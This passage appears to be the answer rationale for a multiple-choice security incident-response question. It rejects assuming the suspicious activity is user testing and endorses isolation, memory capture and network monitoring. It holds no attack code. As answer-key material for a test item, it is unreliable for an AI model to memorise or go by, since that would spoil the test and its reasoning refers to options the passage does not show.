Option D assumes user testing. Legitimate testing is documented, scheduled, and predictable, without manipulating system security controls. Ignoring activity under the assumption of testing could leave sophisticated malware unmitigated, enabling attackers to maintain persistent access, gather credentials, and exfiltrate data. Malicious actors may mimic legitimate activity to evade detection, making careful analysis essential.

Selecting option B ensures immediate containment, forensic analysis, and remediation. Isolation prevents further compromise, memory capture identifies malware behavior, and network monitoring detects command-and-control infrastructure. This approach balances immediate response with thorough investigation, preserves forensic evidence, and strengthens future detection capabilities. Analyzing all four scenarios confirms that only treating the activity as malware provides a structured, effective response to safeguard sensitive data, protect endpoints, and maintain network integrity.